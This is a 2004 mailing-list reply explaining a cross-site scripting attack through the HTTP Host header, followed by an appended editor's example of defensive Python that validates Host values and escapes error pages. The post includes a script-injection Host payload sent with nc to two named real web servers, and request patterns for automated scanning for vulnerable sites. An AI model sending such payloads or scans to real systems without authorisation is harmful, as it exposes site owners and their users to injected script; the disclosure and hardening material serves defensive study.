
Re: MAGIC XSS INTO THE DNS: coelacanth



In-Reply-To: <200406151517.i5FFH8pC029012@xxxxxxxxxxxxxxxxxxxxxxxxx>

This is just a plain simple XSS attack, and additionally it relies on a (long 
since?) patched vulnerability in IIS.

>Still unclear how or why this can be interpreted into the site 
>or through the browser.

What is unclear?
1. they allow (whatever).(domainname) hostnames into the site. That is not very 
uncommon.
2. they generate absolute paths by concatenating "http://"+hostname+"/URI";
3. webserver does not abort with HTTP/1.1 400 Bad Request as it should.


This is not that uncommon, looking for this we will most likely find it in a 
lot of CGI/PHP/JSP/ASP code. Luckily, the attack requires the host to accept 
silly hostnames. The problem with e-gold.com is that they use an old webserver 
with an already fixed IIS vulnerability I think;

bash-2.02$ cat test.txt
GET /hello/just/a/test/please/forgive/me HTTP/1.1
Host: "><script>alert()</script>


bash-2.02$ nc www.microsoft.com 80 < test.txt
HTTP/1.1 400 Bad Request
Content-Type: text/html
Date: Thu, 17 Jun 2004 20:15:07 GMT
Connection: close
Content-Length: 20

<h1>Bad Request</h1>
bash-2.02$ nc www.e-gold.com 80  < test.txt
HTTP/1.1 404 Object Not Found
Server: Microsoft-IIS/4.0
Date: Thu, 17 Jun 2004 20:15:56 GMT
Connection: close
Content-Length: 930
Content-Type: text/html
<cut junk>

To extend the attack to more systems, one needs to find dangerous meta 
characters which are not filtered by normal Bad Request / Bad Address filters.

I did a very hasty search for webservers which would output unformatted 
hostnames or URIs in error messages, without any luck. But I am certain 
someone more tenacious will succeed. The net is vast.

Basically, searches for potentially vulnerable sites can be automated by testing 
a pattern such as:

GET / HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

GET /some_script HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

GET /GIVE-ME-NOT-FOUND HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

GET GIVE-ME-BAD-URI HTTP/1.1
Host: XXXXXXXXXXXXXXXXX

Do we get XXXXXXXXXXXXXXXXX back in HTML?

Would be pretty easy to add the most basic searches to vulnerability scanners I 
think.

Sincerely yours,
Peter, 11a nu
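Added example (editor's note, not part of Peter's post and not code from e-gold or IIS): the defender's side of points 2 and 3 above in Python. It contrasts the vulnerable "http://"+hostname+"/URI" concatenation with a handler that validates the Host header against RFC 1123 hostname syntax plus an allow-list, answers a bad Host with a static 400 exactly as the www.microsoft.com response in the post does, builds absolute URLs from configuration rather than from the request, and HTML-escapes the one piece of request data its 404 page echoes. ALLOWED_HOSTS, CANONICAL_BASE, KNOWN_PATHS and the request strings are constructed for the example; the Host value in SAMPLE_REQUEST is the test.txt line from the post.

```python
import html
import re
from urllib.parse import quote

# Constructed configuration: the canonical names this site is served under and
# the base every absolute URL is built from. Neither comes from the request.
ALLOWED_HOSTS = {"www.example.com", "example.com"}
CANONICAL_BASE = "https://www.example.com"
KNOWN_PATHS = {"/", "/some_script"}

# RFC 1123 hostname (labels of letters, digits and hyphens, max 253 chars)
# with an optional :port. Quotes, angle brackets, spaces and an empty value
# all fail this, which is what a "Bad Address" filter should do.
_HOST_RE = re.compile(
    r"^(?=.{1,253}(?::\d{1,5})?$)"
    r"(?:[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?\.)*"
    r"[a-z0-9](?:[a-z0-9-]{0,61}[a-z0-9])?"
    r"(?::\d{1,5})?$",
    re.IGNORECASE,
)

# Constructed request shaped like test.txt in the post.
SAMPLE_REQUEST = (
    "GET /hello/just/a/test/please/forgive/me HTTP/1.1\r\n"
    'Host: "><script>alert()</script>\r\n'
    "\r\n"
)


def vulnerable_absolute_url(host_header, uri):
    """Point 2 of the post: the raw Host header glued into an absolute URL.
    Whatever the client sent (including markup) ends up in the page."""
    return "http://" + host_header + uri


def validate_host(host_header):
    """Return the lower-cased hostname (port stripped) if the Host header is
    syntactically valid AND on the allow-list, otherwise None."""
    if host_header is None or not _HOST_RE.match(host_header):
        return None
    hostname = host_header.split(":")[0].lower()
    return hostname if hostname in ALLOWED_HOSTS else None


def safe_absolute_url(host_header, uri):
    """Hardened form: scheme and host come from configuration, the path is
    percent-encoded, and an unknown or malformed Host is refused."""
    if validate_host(host_header) is None:
        raise ValueError("400 Bad Request: invalid or unknown Host header")
    return CANONICAL_BASE + quote(uri, safe="/?=&")


def handle_request(raw_request):
    """Parse a minimal HTTP/1.1 request (request line + headers) and return
    (status, body). A bad Host is a static 400 that echoes nothing; a missing
    path is a 404 that echoes only the HTML-escaped path, never the Host."""
    lines = raw_request.splitlines()
    if not lines or len(lines[0].split(" ")) != 3:
        return 400, "<h1>Bad Request</h1>"
    _method, target, _version = lines[0].split(" ", 2)
    headers = {}
    for line in lines[1:]:
        if not line.strip():
            break  # end of the header block
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    host = headers.get("host")
    if validate_host(host) is None:
        # Point 3 of the post: abort here, do not fall through to an error
        # page that reflects the hostname.
        return 400, "<h1>Bad Request</h1>"
    if target not in KNOWN_PATHS:
        return 404, "<h1>Object Not Found</h1><p>%s</p>" % html.escape(target)
    return 200, safe_absolute_url(host, target)


if __name__ == "__main__":
    # The concatenation pattern reflects the header verbatim ...
    print(vulnerable_absolute_url('"><script>alert()</script>', "/x"))
    # ... while the validating handler refuses the same request outright.
    print(handle_request(SAMPLE_REQUEST))
    print(handle_request("GET /some_script HTTP/1.1\r\nHost: www.example.com\r\n\r\n"))
```

The allow-list is the part that matters most: syntax checking alone would still accept attacker-controlled but well-formed names such as a wildcard subdomain (point 1 of the post), so the hostname used in generated URLs must be one the application is configured to serve, and the request's own Host header should never be the source of the scheme or authority.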